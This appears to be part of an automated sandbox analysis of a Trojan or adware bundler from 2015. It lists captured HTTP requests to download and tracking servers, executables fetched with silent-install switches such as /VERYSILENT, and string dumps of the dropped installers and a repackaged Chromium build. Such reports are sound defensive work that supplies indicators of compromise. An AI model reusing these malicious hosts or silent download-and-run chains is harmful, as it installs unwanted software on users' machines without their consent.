Location: hXXp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe
0
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=35161
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop001.am4.t,1446103867.cds043.am4.c
<<< skipped >>>
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:30:54 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 18:22:16 GMT
Connection: keep-alive
ETag: "55563958-f21d"
Accept-Ranges: bytes
<<< skipped >>>
GET /installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: mXR3Zv54paTqJBf4qr 24bc7PrHE5vdig1qWUI 5Nl4UX8Uq/RlZBnbwJwjtrHFH
x-amz-request-id: 3BD68FC8F05BE975
Date: Thu, 29 Oct 2015 07:31:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:27 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1446103888.dop008.am4.t,1446103887.cds063.am4.c
GIF89a.............,...........D..;..
GET /?file=bundle&v=2 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.djapp.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 29 Oct 2015 07:35:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe
0
GET /prepreinstaller_win.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: drz432f7yeokb.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 299008
Connection: keep-alive
Date: Wed, 28 Oct 2015 13:52:38 GMT
Last-Modified: Wed, 28 Oct 2015 13:33:07 GMT
ETag: "8574ef2796bdf5b7c82ae981831e45a5"
Accept-Ranges: bytes
Server: AmazonS3
Age: 63516
X-Cache: Hit from cloudfront
Via: 1.1 73a3bce79e63d88b3a25c9ced0be16f5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -6ja0cLnBjey5qebGeQpqGukrT5xMEAhIGlqp0dc8rlrE_sE71TtkQ==
GET hXXp://events.lxhwspv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= HTTP/1.1
Host: events.lxhwspv.com
Proxy-Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:35:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET /crcb/123/installer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.randkeygen.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:05 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1440089314"
Last-Modified: Thu, 20 Aug 2015 16:48:34 GMT
Cache-Control: max-age=2750
Content-Length: 1965128
Content-Type: application/x-msdownload
X-HW: 1446103865.dop009.fr7.t,1446103865.cds020.fr7.c
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 42851
Connection: keep-alive
Date: Thu, 29 Oct 2015 00:08:07 GMT
Last-Modified: Thu, 29 Oct 2015 00:00:47 GMT
ETag: "8217fb536a761fb752904d84de9e773f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 26572
X-Cache: Hit from cloudfront
Via: 1.1 bc6c3158b6c70458bf3fc3895b89eba6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5O2Rd4xRZ0In7qGU1v8eRQDi9BwMg7Q4fu0zM0CIW27luUEd7XgzMQ==
GET /utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tek0gZGW6yv/cIzPEe JD88ru9T9yemmHz2mfhJn8ZDdIIrlxuMdIDdKqaQlL5sGHGTHflG7itk=
x-amz-request-id: 4EEDCB9AF6B7531D
Date: Thu, 29 Oct 2015 07:31:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:05 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1446103866.dop017.am4.t,1446103865.cds063.am4.c
GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: drz432f7yeokb.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 334336
Connection: keep-alive
Date: Wed, 28 Oct 2015 13:52:41 GMT
Last-Modified: Wed, 28 Oct 2015 13:26:05 GMT
ETag: "a46fd47af97a4430b0fa9ad56eb856d4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 63513
X-Cache: Hit from cloudfront
Via: 1.1 bc6c3158b6c70458bf3fc3895b89eba6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: erc3bw92p3cz5ig1KaVO3-2gxoJVoaIGMXSfaILjKbwyZAi827ECjQ==
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 29 Oct 2015 07:30:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.24
hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
 /md=2 /v=som-tot-jot-cra-opw-crb-crr
hXXp://livestatscounter.com/SysInfo/validator/timer.php
hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe
 q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D
hXXp://dl.randkeygen.com/crcb/123/installer.exe
 /installapp
hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe
 /idn /ch=NOCHPC
hXXp://VVV.djapp.info/?file=bundle&v=2
 -pub_id=353 -adv_id=128
hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe
 /ci 11612
hXXp://mobilitydata5.com/Generic/rsstracker/feed_track.php?sid=6637476637
 
hXXp://VVV.djapp.info/?file=bundle&v=2
 -pub_id=353 -adv_id=128
hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe
/VERYSILENT
hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
http://d10huri5h4o4a3.cloudfront.net/policyname.exe
 /vpol=som
hXXp://VVV.codec13sudha.com/download.php?l4J9dw==
hXXp://download-servers.com/SysInfo/Validate.exe
 /s
hXXp://download-servers.com/SysInfo/Validate.exe
 /s
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 29 Oct 2015 07:30:59 GMT
Content-Type: application/octet-stream
Content-Length: 126474
Connection: keep-alive
X-Powered-By: PHP/5.5.24
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=LRP8nPI.exe
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
nsu5.tmp_468:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp -pub_id=353 -adv_id=128
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp\inetc.dll
hXXp://VVV.djapp.info/?file=bundle&v=2
ysInfo/SearchUpdater.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
System.dll
callback%d
@.reloc
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr22.tmp
nsr22.tmp
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp
Uninstall.exe
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsu5.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
archUpdater.exe&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://VVV.djapp.info/?file=bundle&v=2
Info/SearchUpdater.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nssE.tmp
dlgen.php?r=vu_vo2_
Nullsoft Install System v2.46
1.0.0.1
nsq21.tmp_168:
.text
`.rdata
@.data
.rsrc
@.reloc
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
KERNEL32.dll
USER32.dll
ADVAPI32.dll
GetCPInfo
GetProcessHeap
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
LxHWSpv.com
52.1.45.42:80
chrome.exe_1980:
.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by
user32.dll
c:\projects\chromium_clean\src\chrome\app\chrome_exe_main_win.cc
No valid Chrome version found
c:\projects\chromium_clean\src\chrome\app\client_util.cc
Failed to load Chrome DLL from
ChromeMain
RelaunchChromeBrowserWithNewCommandLineIfNeeded
Could not find exported function
1.3.21.115
Chrome
0.0.0.0-devel
url-chunk
font_key_name
subresource_url
%s-%x
CHROME_MAIN_TIME
c:\projects\chromium_clean\src\chrome\installer\util\install_util.cc
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
c:\projects\chromium_clean\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
c:\projects\chromium_clean\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
c:\projects\chromium_clean\src\chrome\installer\util\app_command.cc
c:\projects\chromium_clean\src\chrome\app\image_pre_reader_win.cc
Check failed: pe_image.VerifyMagic().
reinterpret_cast(section 1)
section == pe_image.GetImageSectionFromAddr(start)
section == pe_image.GetImageSectionFromAddr(start length - 1)
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
c:\projects\chromium_clean\src\base\win\scoped_handle.cc
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
PlatformFile.UnknownErrors.Windows
c:\projects\chromium_clean\src\base\pickle.cc
.thunks
.syzygy
Check failed: PlatformThreadLocalStorage::AllocTLS(&key).
c:\projects\chromium_clean\src\base\threading\thread_local_storage.cc
Check failed: PlatformThreadLocalStorage::AllocTLS(&key) && key != PlatformThreadLocalStorage::TLS_KEY_OUT_OF_INDEXES.
Check failed: !PlatformThreadLocalStorage::GetTLSValue(key).
kernel32.dll
c:\projects\chromium_clean\src\sandbox\win\src\broker_services.cc
Check failed: AssociateCompletionPort(tracker->job, job_port_, tracker.get()).
c:\projects\chromium_clean\src\sandbox\win\src\sandbox_policy_base.cc
c:\projects\chromium_clean\src\sandbox\win\src\handle_closer_agent.cc
Check failed: name.second.
c:\projects\chromium_clean\src\sandbox\win\src\interception.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
full-memory-crash-report
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
chrome.googleechotest.com
CHROME_BREAKPAD_PIPE_NAME
c:\projects\chromium_clean\src\components\crash\app\breakpad_win.cc
NTDLL.DLL
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
c:\projects\chromium_clean\src\out\Release\initialexe\chrome.exe.pdb
chrome.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
SignalChromeElf
chrome_elf.dll
VERSION.dll
WINMM.dll
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
ADVAPI32.dll
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
USER32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
WTSAPI32.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
5.64686
4,50585
chrome_watcher.dll
ntdll.dll
chrome.dll
chrome_child.dll
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web fast
Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess
-chrome
-chromeframe
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
DGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Uninstall Chrome Frame
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
Ndebug.log
.\debug.log
\StringFileInfo\xx\%ls
Chrome_MessageWindow
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
shell32.dll
gcswf32.dll
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
Dmscoree.dll
ADVAPI32.DLL
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
dbghelp.dll
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe
45.0.2433.0
chrome_exe
avg23.exe_1836_rwx_03EF0000_00005000:
avg23.exe_1836_rwx_03F10000_00010000: